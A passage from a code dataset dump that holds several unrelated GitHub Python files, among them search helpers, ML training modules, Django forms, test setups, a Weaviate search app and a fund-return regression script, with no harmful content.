_split_re.findall(text)\n\nasync def do_flags(spell_check=False, synonyms=False):\n flag = (xapian.QueryParser.FLAG_PARTIAL \n | xapian.QueryParser.FLAG_LOVEHATE\n | xapian.QueryParser.FLAG_PHRASE\n | xapian.QueryParser.FLAG_WILDCARD)\n\n if spell_check:\n flag |= xapian.QueryParser.FLAG_SPELLING_CORRECTION\n \n if synonyms:\n flag |= (xapian.QueryParser.FLAG_AUTO_SYNONYMS | \n xapian.QueryParser.FLAG_AUTO_MULTIWORD_SYNONYMS |\n xapian.QueryParser.FLAG_SYNONYM)\n\n return flag \n \nasync def join_query(op, *querylist):\n _query = None\n for i, query in enumerate(querylist):\n if i == 0: \n _query = query\n else:\n if query:\n _query = xapian.Query(op, _query, query)\n \n return _query\n\nasync def query_fields(querystring, queryparser, fields):\n queries = []\n for _, field in fields:\n field_prefix = TERM_PREFIXES[\"field\"] + field.upper()\n field_query = queryparser.parse_query(querystring, 1, field_prefix)\n\n queries.append(field_query)\n \n return await join_query(xapian.Query.OP_OR, *queries)\n\nasync def query_facets(querystring, queryparser, facets):\n queries = []\n slots = []\n for field_slot, field_name, facet in facets:\n slots.append(field_slot)\n field_prefix = TERM_PREFIXES[\"field\"] + field_name.upper()\n\n if isinstance(facet, str):\n queries.append(\n xapian.Query('{}:{}'.format(field_prefix, facet))\n )\n elif isinstance(facet, list):\n for f in facet:\n if isinstance(f, str):\n queries.append(\n xapian.Query('{}:{}'.format(field_prefix, f))\n )\n \n return slots, await join_query(xapian.Query.OP_AND, *queries)\n\nasync def query_ranges(queryparser, ranges):\n \n queries = []\n\n keymaker = xapian.MultiValueKeyMaker()\n\n for field_slot, _, value in ranges:\n if not isinstance(value, str):\n raise ValueError(\"Range value must be a string\")\n\n match = _range_re.fullmatch(value)\n\n start, end, mode = match.group(\"start\", \"end\", \"mode\")\n range_str = f\"{start}..{ end if end else '' }\"\n\n queryparser.add_valuerangeprocessor(\n xapian.NumberValueRangeProcessor(field_slot)\n )\n\n range_query = queryparser.parse_query(range_str)\n queries.append(range_query)\n\n if mode:\n if mode == \"asc\":\n keymaker.add_value(field_slot, False)\n elif mode == \"desc\":\n keymaker.add_value(field_slot, True)\n \n return await join_query(xapian.Query.OP_AND, *queries), keymaker\n \n\n","repo_name":"keosariel/spotlyt-beta","sub_path":"spotlyt/searcher.py","file_name":"searcher.py","file_ext":"py","file_size_in_byte":3737,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"15480434380","text":"# kakao_zip string trim\n\ndef solution(msg):\n dic,answer = list('0ABCDEFGHIJKLMNOPQRSTUVWXYZ'),[]\n \n while msg:\n out = False\n for i in range(len(msg)-1,-1,-1):\n for j in range(len(dic)-1,-1,-1):\n if dic[j] == msg[:i+1]:\n dic.append(msg[:i+2])\n msg = msg[i+1:]\n answer.append(j)\n out = True\n break\n if out : break\n \n return answer\n \nif __name__ == \"__main__\":\n msg = 'ABABABABABABABAB' \n print(solution(msg))\n","repo_name":"light-src/AlgoForTest","sub_path":"Programmers/190829 [3차] 압축/tyl.py","file_name":"tyl.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"39540814038","text":"import io\nimport unittest\nfrom unittest import mock\n\nfrom src.day_05 import countOverlappingPoints\n\nEXAMPLE_INPUT = \"\"\"0,9 -> 5,9\n8,0 -> 0,8\n9,4 -> 3,4\n2,2 -> 2,1\n7,0 -> 7,4\n6,4 -> 2,0\n0,9 -> 2,9\n3,4 -> 1,4\n0,0 -> 8,8\n5,5 -> 8,2\"\"\"\n\nclass TestDay05(unittest.TestCase):\n\n def test_first_example(self):\n fake_file = io.StringIO(EXAMPLE_INPUT)\n with mock.patch('src.day_05.open', return_value=fake_file, create=True):\n self.assertEqual(5, countOverlappingPoints(\"test.txt\", False))\n\n def test_second_example(self):\n fake_file = io.StringIO(EXAMPLE_INPUT)\n with mock.patch('src.day_05.open', return_value=fake_file, create=True):\n self.assertEqual(12, countOverlappingPoints(\"test.txt\", True))\n","repo_name":"matthew-griffin/advent-code-2021","sub_path":"tests/test_day_05.py","file_name":"test_day_05.py","file_ext":"py","file_size_in_byte":746,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"36066539156","text":"from transformers.modeling_outputs import SequenceClassifierOutput\nfrom transformers.models.roberta.modeling_roberta import RobertaConfig, RobertaForSequenceClassification\nimport torch.nn as nn\nimport torch\n\nimport pytorch_lightning as pl\n\nfrom util.others.my_metrics import Accuracy\nfrom util.others.dist_utils import is_main_process\n\nfrom transformers import (\n get_cosine_schedule_with_warmup\n)\n\nclass Intent_CLS_Module(pl.LightningModule):\n def __init__(self, _config, num_labels=2):\n super().__init__()\n self.save_hyperparameters()\n \n if _config['model_name'] == 'roberta-base':\n model_config = RobertaConfig.from_pretrained(pretrained_model_name_or_path=\"roberta-base\",\n hidden_dropout_prob=0.1, num_labels=num_labels)\n self.model = RobertaForSequenceClassification.from_pretrained(\"roberta-base\", config=model_config)\n \n self.metric = Accuracy()\n\n def forward(self, input_ids, attention_mask, labels=None):\n \n outputs = self.model.roberta(input_ids=input_ids, attention_mask=attention_mask)\n sequence_output = outputs[0]\n logits = self.model.classifier(sequence_output)\n \n loss_fct = nn.CrossEntropyLoss()\n loss = loss_fct(logits, labels)\n \n return SequenceClassifierOutput(\n loss=loss,\n logits=logits,\n hidden_states=outputs.hidden_states,\n attentions=outputs.attentions,\n )\n \n def training_step(self, batch, batch_idx):\n output = self(**batch)\n \n self.log(f\"train/loss\", output.loss)\n return output.loss\n \n def validation_step(self, batch, batch_idx):\n output = self(**batch)\n self.metric.update(output.logits, batch['labels'])\n \n self.log(f\"val/loss\", output.loss)\n\n def validation_epoch_end(self, outs):\n accuracy = self.metric.compute().tolist()\n # if is_main_process():\n # print(f'accuracy: {str(accuracy)}')\n self.metric.reset()\n \n self.log(f\"val/accuracy\", accuracy)\n \n def test_step(self, batch, batch_idx):\n output = self(**batch)\n self.metric.update(output.logits, batch['labels'])\n \n def configure_optimizers(self):\n param_optimizer = self.named_parameters()\n no_decay = ['bias', 'LayerNorm.bias', 'LayerNorm.weight']\n optimizer_grouped_parameters = [{\n 'params': [\n p for n, p in param_optimizer\n if not any(nd in n for nd in no_decay)\n ],\n 'weight_decay':\n 0.01\n }, {\n 'params':\n [p for n, p in param_optimizer if any(nd in n for nd in no_decay)],\n 'weight_decay':\n 0.0\n }]\n optimizer = torch.optim.AdamW(optimizer_grouped_parameters, lr=0.00005, betas=(0.9, 0.999))\n scheduler = get_cosine_schedule_with_warmup(\n optimizer, num_warmup_steps=self.hparams._config['warmup_steps'], num_training_steps=self.hparams._config['max_steps']\n )\n\n sched = {\"scheduler\": scheduler, \"interval\": \"step\"}\n\n return (\n [optimizer],\n [sched],\n )\n","repo_name":"ZIZUN/pytorch_lightning_template","sub_path":"util/model/Classifier.py","file_name":"Classifier.py","file_ext":"py","file_size_in_byte":3284,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"6552596071","text":"from hexagonit.testing.browser import Browser\nfrom plone.app.testing import SITE_OWNER_NAME\nfrom plone.app.testing import SITE_OWNER_PASSWORD\nfrom plone.app.testing import TEST_USER_ID\nfrom plone.app.testing import TEST_USER_NAME\nfrom plone.app.testing import TEST_USER_PASSWORD\nfrom plone.app.testing import setRoles\nfrom plone.testing import layered\nfrom sll.templates.tests.base import FUNCTIONAL_TESTING\nfrom sll.templates.browser.interfaces import ITopPageFeed\nfrom zope.testing import renormalizing\nfrom zope.interface import alsoProvides\n\n\nimport doctest\nimport manuel.codeblock\nimport manuel.doctest\nimport manuel.testing\nimport re\nimport transaction\nimport unittest\n\nFLAGS = doctest.NORMALIZE_WHITESPACE | doctest.ELLIPSIS | doctest.REPORT_NDIFF | doctest.REPORT_ONLY_FIRST_FAILURE\n\nCHECKER = renormalizing.RENormalizing([\n # Normalize the generated UUID values to always compare equal.\n (re.compile(r'[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}'), '<UUID>'),\n])\n\n\ndef setUp(self):\n layer = self.globs['layer']\n # Update global variables within the tests.\n self.globs.update({\n 'portal': layer['portal'],\n 'portal_url': layer['portal'].absolute_url(),\n 'browser': Browser(layer['app']),\n 'TEST_USER_ID': TEST_USER_ID,\n 'TEST_USER_NAME': TEST_USER_NAME,\n 'TEST_USER_PASSWORD': TEST_USER_PASSWORD,\n 'SITE_OWNER_NAME': SITE_OWNER_NAME,\n 'SITE_OWNER_PASSWORD': SITE_OWNER_PASSWORD,\n })\n\n portal = self.globs['portal']\n browser = self.globs['browser']\n portal_url = self.globs['portal_url']\n browser.setBaseUrl(portal_url)\n\n browser.handleErrors = True\n portal.error_log._ignored_exceptions = ()\n\n setRoles(portal, TEST_USER_ID, ['Manager'])\n\n folder = portal[\n portal.invokeFactory(\n 'Folder',\n 'folder',\n title='Title of Folder',\n description='Description of Folder.',\n )\n ]\n folder.reindexObject()\n\n ids = ['01', '02']\n for oid in ids:\n obj = folder[\n folder.invokeFactory(\n 'Document',\n 'doc{0}'.format(oid),\n title='Title of Document{0}'.format(oid),\n description='Description of Document{0}'.format(oid),\n text='<p>This is the body text of Document{0}.</p>'.format(oid),\n )\n ]\n alsoProvides(obj, ITopPageFeed)\n obj.setEffectiveDate(obj.modified())\n obj.reindexObject()\n doc03 = folder[folder.invokeFactory(\n 'Document', 'doc03', title='Title of Document03', description='Description of Document03',\n text='<p>This is the body text of Document03.</p>')]\n doc03.setEffectiveDate(doc03.modified())\n doc03.reindexObject()\n\n transaction.commit()\n\n\ndef DocFileSuite(testfile, flags=FLAGS, setUp=setUp, layer=FUNCTIONAL_TESTING):\n \"\"\"Returns a test suite configured with a test layer.\n\n :param testfile: Path to a doctest file.\n :type testfile: str\n\n :param flags: Doctest test flags.\n :type flags: int\n\n :param setUp: Test set up function.\n :type setUp: callable\n\n :param layer: Test layer\n :type layer: object\n\n :rtype: `manuel.testing.TestSuite`\n \"\"\"\n m = manuel.doctest.Manuel(optionflags=flags, checker=CHECKER)\n m += manuel.codeblock.Manuel()\n\n return layered(\n manuel.testing.TestSuite(m, testfile, setUp=setUp, globs=dict(layer=layer)),\n layer=layer)\n\n\ndef test_suite():\n return unittest.TestSuite([\n DocFileSuite('functional/folder.txt'),\n DocFileSuite('functional/portal.txt')])\n","repo_name":"taito-zz/sll.templates","sub_path":"src/sll/templates/tests/test_folder.py","file_name":"test_folder.py","file_ext":"py","file_size_in_byte":3608,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"8779294742","text":"from bot import Bot\nfrom bot import *\nfrom AddressBook import *\nfrom rich.console import Console\nfrom classes import *\nfrom note_tag import *\nimport difflib\n\n# for package install\nVERSION = \"0.9.0\"\n\nCOMMANDS = {\n add_command: (\"add\", \"+\", \"2\",\"adding\",\"append\"),\n change_command: (\"change\", \"зміни\", \"3\"),\n exit_command: (\"bye\", \"exit\", \"end\",\"GoodBye\", \"0\"),\n delete_contact_command:(\"del\",\"8\", \"delete\"),\n find_command: (\"find\", \"4\"),\n show_all_command: (\"show-all\", \"5\", \"show\",\"showing\"),\n hello_command:(\"hello\", \"1\"),\n edit_name_command: (\"edit\", \"7\",\"rename\"),\n change_birthday_command: (\"change-bday\", \"6\",\"change-birthday\", \"changebday\",\"changebirthday\"),\n change_email_command: (\"change-email\", \"9\", \"change-mail\", \"changemail\", \"changeemail\"),\n change_address_command: (\"change-address\", \"10\",\"changeaddress\"),\n sort_files: (\"sort\",\"sorting\"),\n contacts_in_period: (\"period\", \"bdays\",\"congrats\"),\n help_command: (\"help\"),\n show_notes: (\"show-notes\", \"n5\"),\n make_note: (\"make-notes\", \"add-notes\", \"+n\"),\n bot_add_teg: (\"add-tag\",\"+t\"),\n bot_change_teg: (\"change-tag\",\"=t\"),\n bot_add_text_note: (\"add-text\"),\n bot_change_text_note: (\"change-text\",\"=text\"),\n delete_note_by_number: (\"delete-note\",\"-n\"),\n search_notes: (\"search-n\",\"search-notes\",\"search-tag\",\"fnt\")\n \n}\n\ndef get_closest_matches(user_input, commands, n=3, cutoff=0.6):\n user_input_lower = user_input.lower()\n closest_matches = []\n for cmd, kwds in commands.items():\n for kwd in kwds:\n if kwd in user_input_lower:\n closest_matches.append(kwd)\n if not closest_matches:\n user_words = user_input_lower.split()\n for cmd, kwds in commands.items():\n for kwd in kwds:\n for word in user_words:\n similarity = difflib.SequenceMatcher(None, word, kwd).ratio()\n if similarity >= 0.5: # Поріг схожості, можна налаштувати під свої потреби\n closest_matches.append(kwd)\n break\n return closest_matches\n\ndef parser(text: str):\n text_lst = text.split(\" \")\n for cmd, kwds in COMMANDS.items():\n kwd = text_lst[0]\n if len(text_lst) and kwd in kwds:\n data = text[len(kwd):].strip().split()\n return cmd, data\n\n matches = get_closest_matches(text, COMMANDS)\n if matches:\n return closest_matches_suggestion, (matches,)\n\n return unknown_command, [text]\n \n # for kwd in kwds:\n # if text.lower().startswith(kwd):\n # data = text[len(kwd):].strip().split()\n # if cmd in [change_command, edit_name_command]:\n # if len(data) < 3:\n # data.append(None)\n # return cmd, data\n\n\ndef closest_matches_suggestion(matches):\n return f\"Did you mean one of the following commands: {', '.join(matches)}?\"\n\ndef unknown_command(text):\n return f\"Unknown command: '{text}'. Type 'help' to see the list of available commands.\"\n\ndef main():\n print('Hello. I am your contact-assistant.\\nWhat can I do for you?')\n \n while True:\n user_input = input(\"enter your choices--->>> \")\n\n cmd, data = parser(user_input)\n\n if cmd == exit_command:\n print(\"Goodbye!\")\n break\n\n result = cmd(*data) # Оброблюємо команду та отримуємо результат\n\n if cmd == closest_matches_suggestion:\n print(result) # Виводимо повідомлення з пропозиціями варіантів команд\n elif cmd == unknown_command:\n print(result) # Виводимо повідомлення про невідому команду\n else:\n if isinstance(result, str):\n print(result)\n else:\n console = Console()\n console.print(result)\n\n \n \n\nif __name__ == \"__main__\":\n bot = Bot()\n main()\n","repo_name":"AlexanderBgit/PyCore15_Team7","sub_path":"__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":4081,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"28118904419","text":"# magick convert *.png simsph.gif\nimport os\nimport sys\nimport numpy as np\nimport glob\n\n\noutpath = 'processed1_test'\nif (os.path.exists(outpath) == False):\n os.mkdir(outpath)\n\npath = 'sph_sim_output'\nfiles = sorted(glob.glob(path + \"/*\"))\n\nfor i,f in enumerate(files):\n print (f)\n df = np.loadtxt(f) \n\n floats = df.astype(float)\n np.save(outpath + '/outputFloat-%02d.npy' % i, floats)\n\n print(\"running\" + str(i))\n","repo_name":"BCarcasi/Fluid-Engine","sub_path":"Fluid Engine/ConvertToFloat.py","file_name":"ConvertToFloat.py","file_ext":"py","file_size_in_byte":433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"3869563230","text":"from django import forms\nfrom .models import PdfUpload\n\nclass PdfUploadForm(forms.ModelForm):\n \"\"\"PDFアップロードフォーム\"\"\"\n\n class Meta:\n model = PdfUpload\n fields = ('upload',)\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n for field in self.fields.values():\n field.widget.attrs[\"class\"] = \"form-control\"\n\nfrom datetime import date, datetime\n\nclass QueryDateForm(forms.Form):\n \"\"\"日付検索フォーム\"\"\"\n date = forms.DateField(\n label='日付',\n widget=forms.SelectDateWidget(\n attrs={'class': 'form-select'},\n years=range(datetime.today().year, datetime.today().year - 9, -1)\n )\n )\n\nfrom django.core.exceptions import ValidationError\nfrom django.utils.translation import ugettext_lazy as _\n\nclass QueryDatePeriodForm(forms.Form):\n \"\"\"日付期間検索フォーム\"\"\"\n error_css_class = 'error'\n\n start_period = forms.DateField(\n label='開始日',\n widget=forms.SelectDateWidget(\n attrs={'class': 'form-select'},\n years=range(datetime.today().year, datetime.today().year - 9, -1)\n )\n )\n end_period = forms.DateField(\n label='終了日',\n widget=forms.SelectDateWidget(\n attrs={'class': 'form-select'},\n years=range(datetime.today().year, datetime.today().year - 9, -1)\n )\n )\n\n def clean(self):\n cleaned_data = super().clean()\n start_period = cleaned_data.get('start_period')\n end_period = cleaned_data.get('end_period')\n\n if start_period and end_period:\n if start_period > end_period:\n raise ValidationError(_('開始日は完了日よりも前の日付に設定して下さい。'))","repo_name":"akifumi-maeda/django-pdf-uploader","sub_path":"app/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1816,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"11061603658","text":"import io\nimport os\nimport streamlit as st\nimport weaviate\nfrom PIL import Image\nimport base64\n\n# Connect to Weaviate\nweaviate_client = weaviate.Client(url=\"http://localhost:8080\")\n\ndef set_bg(image_file):\n with open(image_file, \"rb\") as image_file:\n encoded_string = base64.b64encode(image_file.read())\n st.markdown(\n f\"\"\"\n <style>\n .stApp {{\n background-image: url(data:image/{\"webp\"};base64,{encoded_string.decode()});\n background-size: cover\n }}\n </style>\n \"\"\",\n unsafe_allow_html=True\n )\n\n# Helper function to convert a file to base64 representation\ndef toBase64(path):\n with open(path, 'rb') as file:\n return base64.b64encode(file.read()).decode('utf-8')\n \ndef text_to_media(query):\n # Search for media with the given query\n response = weaviate_client.query.get(\"Craigslist\", \"name path desc url mediaType\").with_near_text({\"concepts\": query}).with_limit(10).with_additional('distance').do()\n result = response[\"data\"][\"Get\"][\"Craigslist\"]\n final_results = []\n\n for r in result:\n print(f\"{r['_additional']['distance']},{r['desc']}\")\n if r['_additional']['distance'] <= 0.75:\n final_results.append(r)\n\n return final_results\n\ndef image_search(image_path):\n # Search for images that are similar to the provided image of test-meerkat, test-dog, test-cat\n response = weaviate_client.query.get(\"Craigslist\", \"name path desc url mediaType\").with_near_image({\"image\": image_path}).with_limit(10).with_additional('distance').do()\n result = response[\"data\"][\"Get\"][\"Craigslist\"]\n final_results = []\n\n for r in result:\n print(f\"{r['_additional']['distance']}\")\n if r['_additional']['distance'] <= 0.75:\n final_results.append(r)\n\n return final_results\n\ndef main():\n st.title(\"Nextgen Craigslist Powered by GAI\")\n\n # Set background image\n set_bg('bg.webp')\n\n # Image Upload\n st.subheader(\"Upload an Image:\")\n uploaded_image = st.file_uploader(\"Choose an image...\", type=[\"jpg\", \"png\", \"jpeg\"])\n\n query = st.text_input(\"Or enter a text query:\")\n\n if st.button(\"Search\"):\n if uploaded_image:\n path = os.path.join('.', uploaded_image.name)\n # image = toBase64(path)\n # image = Image.open(uploaded_image)\n # image_bytes = io.BytesIO()\n # image.save(image_bytes, format=\"JPEG\")\n # image_data = image_bytes.getvalue()\n\n # Perform image-based search\n # You need to implement this part using your specific Weaviate capabilities\n # Here, I assume that you have a separate function for image-based search\n # Replace the 'image_search' function with your own implementation\n # print(type(image), image)\n results = image_search(path)\n elif query:\n results = text_to_media(query)\n else:\n st.markdown(\"Please upload an image or enter a text query.\")\n\n if results:\n st.markdown(f\"Found {len(results)} results:\")\n for result in results:\n st.image(result[\"path\"])\n st.write(result[\"name\"])\n st.write(result[\"desc\"])\n else:\n st.markdown(\"No results found.\")\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"nataliepan/ClassiAi","sub_path":"nextgen-craigslist.py","file_name":"nextgen-craigslist.py","file_ext":"py","file_size_in_byte":3313,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"16487099691","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Apr 22 09:23:26 2022\n\n@author: gojja och willi\n\"\"\"\n\n#%% Packages\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom sklearn import datasets, linear_model, metrics\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\n\n#%% Loading data (induvidual fund)\n\ny_p = pd.read_csv(r\".../Data/Clean/passive_returns_m_df.csv\", index_col=0)\ny_p = y_p.iloc[:,0:3].dropna()\n\ny_a = pd.read_csv(r\".../Data/Clean/active_returns_m_df.csv\", index_col=0)\n\n#x = pd.read_csv(r\".../Data/Clean/x_mon_df.csv\")\nx = pd.read_csv(r\".../Data/Clean/x_df_2.csv\")\n#x.drop('USREC', inplace=True, axis=1)\n\n#%% Creating X and y (individual fund)\n\ndf = pd.merge(y_p,x, on=['year', 'month'], how = \"inner\")\ndf = df.assign(day = 1)\ndf.index = pd.to_datetime(df[['year', 'month', 'day']])\ndf.drop(['year', 'month', 'day'], inplace=True, axis=1)\n\ny = df.iloc[:,0]\nX = df.iloc[:,1:]\n\n#%% Spliting data (induvidual fund)\n\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, random_state=1)\n\n\n#%% Linear regression (induvidual fund)\n\nmodel = linear_model.LinearRegression()\nmodel.fit(X_train, y_train)\n\n# regression coefficients\nprint('Coefficients: ', model.coef_)\n\n# variance score: 1 means perfect prediction\nprint('Variance score: {}'.format(model.score(X_test, y_test)))\n\n# plot for residual error\nplt.style.use('fivethirtyeight')\nplt.scatter(model.predict(X_train), model.predict(X_train) - y_train,\n color = \"green\", s = 10, label = 'Train data')\nplt.scatter(model.predict(X_test), model.predict(X_test) - y_test,\n color = \"blue\", s = 10, label = 'Test data')\nplt.hlines(y = 0, xmin = -0.05, xmax = 0.05, linewidth = 2)\nplt.legend(loc = 'upper right')\nplt.title(\"Residual errors\")\nplt.show()\n\npredictions = model.predict(X_test)\ny_bar = y_test.mean()\n\non = sum((y_test-y_bar)**2)/y_test.shape[0]\nvn = sum((y_test-predictions)**2)/y_test.shape[0]\nsn = on - vn\nr2 = sn/on\n\n# =============================================================================\n#%% Aggregate y\n# =============================================================================\n\n#Loading data (agg_y)\ndf = pd.read_csv(r\".../Data/Clean/X_time_fix_mon.csv\")\n\n#%% Creating X and y (agg_y)\nX = df.iloc[:,1:]\ny = df.iloc[:,0]\n\n#%% Spliting data (agg_y)\n\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, random_state=1)\n\n#%% Linear regression (agg_y)\n\nmodel = linear_model.LinearRegression()\nmodel.fit(X_train, y_train)\n\n# regression coefficients\nprint('Coefficients: ', model.coef_)\n\n# variance score: 1 means perfect prediction\nprint('Variance score: {}'.format(model.score(X_test, y_test)))\n\n# plot for residual error\nplt.style.use('fivethirtyeight')\nplt.scatter(model.predict(X_train), model.predict(X_train) - y_train,\n color = \"green\", s = 10, label = 'Train data')\nplt.scatter(model.predict(X_test), model.predict(X_test) - y_test,\n color = \"blue\", s = 10, label = 'Test data')\nplt.hlines(y = 0, xmin = -0.05, xmax = 0.05, linewidth = 2)\nplt.legend(loc = 'upper right')\nplt.title(\"Residual errors\")\nplt.show()\n\npredictions = model.predict(X_test)\ny_bar = y_test.mean()\n\non = sum((y_test-y_bar)**2)/y_test.shape[0]\nvn = sum((y_test-predictions)**2)/y_test.shape[0]\nsn = on - vn\nr2 = sn/on\n\n# =============================================================================\n#%% Regular in loop\n# =============================================================================\n\n# Loading data\n\ny_p = pd.read_csv(r\".../Data/Clean/passive_returns_m_df.csv\", index_col=0)\ny_a = pd.read_csv(r\".../Data/Clean/active_returns_m_df.csv\", index_col=0)\n\nx = pd.read_csv(r\".../Data/Clean/x_df_2.csv\")\n\n#df = df.assign(day = 1)\n#df.index = pd.to_datetime(df[['year', 'month', 'day']])\n#df.drop(['year', 'month', 'day'], inplace=True, axis=1)\n\ndef num_obs(df):\n obs = np.zeros(shape = (df.shape[1]-2,1))\n for i in range (df.shape[1]-2):\n obs[i] = df.value_counts(subset=df.columns[i+2]).shape[0]\n return(obs)\n\nn_obs_p = pd.DataFrame(num_obs(y_p))\nn_obs_p.index = y_p.columns[2:]\n\nn_obs_a = pd.DataFrame(num_obs(y_a))\nn_obs_a.index = y_a.columns[2:]\n\nn_obs_few_p = n_obs_p[n_obs_p>=24].dropna()\nn_obs_few_a = n_obs_a[n_obs_a>=24].dropna()\n\nsel_p = n_obs_few_p.index\nsel_a = n_obs_few_a.index\n\ny_2_p = y_p[sel_p]\ny_2_p.insert(0,'month',y_p['month'])\ny_2_p.insert(0,'year',y_p['year'])\n\ny_2_a = y_a[sel_a]\ny_2_a.insert(0,'month',y_a['month'])\ny_2_a.insert(0,'year',y_a['year'])\n\ndf = pd.merge(y_2,x, on=['year', 'month'], how = \"inner\")\n\ndef lin_reg(df,y):\n r2 = np.zeros(shape =(y.shape[1]-2,1))\n for i in range(y.shape[1]-2):\n df_temp = df.dropna(axis = 0, how = 'any', subset=df.columns[i+2])\n y_temp = df_temp.iloc[:,i+2]\n X_temp = df_temp.iloc[:,y_2.shape[1]:]\n X_temp.insert(0,'const',1) # Read that adding a constatnt would help, but did not imporve the r2\n X_train, X_test, y_train, y_test = train_test_split(X_temp, y_temp, test_size=0.3,\n random_state=1)\n model = linear_model.LinearRegression()\n model.fit(X_train, y_train)\n r2[i] = model.score(X_test, y_test)\n return (r2)\n\nr2_test = lin_reg(df,y_2)\nr2_test = pd.DataFrame(r2_test)\nr2_test_2 = r2_test[r2_test>=-2000].dropna()\nr2_test_3 = r2_test[r2_test>=-1000].dropna()\nr2_test_3_avg = r2_test_3.mean()\nr2_test_2_avg = r2_test_2.mean()\nr2_test_avg = r2_test.mean()\n\nsum(r2_test)\n\npredictions = model.predict(X_test)\ny_bar = y_test.mean()\n\non = sum((y_test-y_bar)**2)/y_test.shape[0]\nvn = sum((y_test-predictions)**2)/y_test.shape[0]\nsn = on - vn\nr2 = sn/on\n\n# regression coefficients\nprint('Coefficients: ', model.coef_)\n\n# variance score: 1 means perfect prediction\nprint('Variance score: {}'.format(model.score(X_test, y_test)))\n\n# plot for residual error\nplt.style.use('fivethirtyeight')\nplt.scatter(model.predict(X_train), model.predict(X_train) - y_train,\n color = \"green\", s = 10, label = 'Train data')\nplt.scatter(model.predict(X_test), model.predict(X_test) - y_test,\n color = \"blue\", s = 10, label = 'Test data')\nplt.hlines(y = 0, xmin = -0.05, xmax = 0.05, linewidth = 2)\nplt.legend(loc = 'upper right')\nplt.title(\"Residual errors\")\nplt.show()\n\npredictions = model.predict(X_test)\ny_bar = y_test.mean()\n\non = sum((y_test-y_bar)**2)/y_test.shape[0]\nvn = sum((y_test-predictions)**2)/y_test.shape[0]\nsn = on - vn\nr2 = sn/on\n\n# =============================================================================\n#%% loading data (long format)\n# =============================================================================\n\ndf_long_p = pd.read_csv(r\".../Data/Clean/df_m_long_p.csv\")\ndf_long_a = pd.read_csv(r\".../Data/Clean/df_m_long_a.csv\")\n\nX_p = df_long_p.iloc[:,4:]\ny_p = df_long_p.iloc[:,1]\n\nX_a = df_long_a.iloc[:,4:]\ny_a = df_long_a.iloc[:,1]\n\n#%% Spliting data (long format)\n\nX_train_long, X_test_long, y_train_long, y_test_long = train_test_split(X_p, \n y_p, \n test_size=0.3, \n random_state=1)\n\n#%% Linear regression (long df format)\n\nmodel = linear_model.LinearRegression()\nmodel.fit(X_train_long, y_train_long)\n\n# regression coefficients\nprint('Coefficients: ', model.coef_)\n\n# variance score: 1 means perfect prediction\nprint('Variance score: {}'.format(model.score(X_test_long, y_test_long)))\n\n# plot for residual error\nplt.style.use('fivethirtyeight')\nplt.scatter(model.predict(X_train_long), model.predict(X_train_long) - y_train_long,\n color = \"green\", s = 10, label = 'Train data')\nplt.scatter(model.predict(X_test_long), model.predict(X_test_long) - y_test_long,\n color = \"blue\", s = 10, label = 'Test data')\nplt.hlines(y = 0, xmin = -0.05, xmax = 0.05, linewidth = 2)\nplt.legend(loc = 'upper right')\nplt.title(\"Residual errors\")\nplt.show()\n\npredictions_long = model.predict(X_test_long)\ny_bar_long = y_test_long.mean()\n\non_long = sum((y_test_long-y_bar_long)**2)/y_test_long.shape[0]\nvn_long = sum((y_test_long-predictions_long)**2)/y_test_long.shape[0]\nsn_long = on_long - vn_long\nr2_long = sn_long/on_long\n\n# Notes for future research:\n# Try the aggregate version\n# Try the dis-aggregated version but while not allowing low amounts of obs.\n# Try the panel-data version with the correct data format. (normalization?, growth rates) ","repo_name":"williantleite/DML_in_Finance","sub_path":"Dev/linear_regression.py","file_name":"linear_regression.py","file_ext":"py","file_size_in_byte":8470,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"9610679528","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport IPy\nimport json\nimport time\nimport copy\nimport when\nimport arrow\nimport random\nimport logging\nimport openpyxl\n\nfrom openpyxl.styles import Alignment\nfrom tornado import web, gen, httpclient\nfrom tornado.httputil import url_concat\nfrom settings import COMMON_URL, STATE, BILL_PAY_STATE, PAY_TYPE, PAY_MD, ORDER_STATE\n\n\nhttpclient.AsyncHTTPClient.configure('tornado.simple_httpclient.SimpleAsyncHTTPClient', max_clients=300)\n\n\nclass APIError(web.HTTPError):\n '''\n 自定义API异常\n '''\n def __init__(self, status_code=200, *args, **kwargs):\n super(APIError, self).__init__(status_code, *args, **kwargs)\n self.kwargs = kwargs\n\ndef dict_filter(target, attr=()):\n result = dict()\n for p in attr:\n if type(p) is dict:\n key = list(p.keys())[0]\n value = list(p.values())[0]\n result[value] = target[key] if key in target else ''\n elif p in target:\n result[p] = target[p]\n return result\n\ndef toNone(va):\n # empty to none\n return None if not va else va\n\ndef http_request(url, method='GET', **wargs):\n return httpclient.HTTPRequest(url=url, method=method, connect_timeout=10, request_timeout=10, **wargs)\n\ndef get_async_client():\n http_client = httpclient.AsyncHTTPClient()\n return http_client\n\nasync def fetch(http_client, request):\n r = await 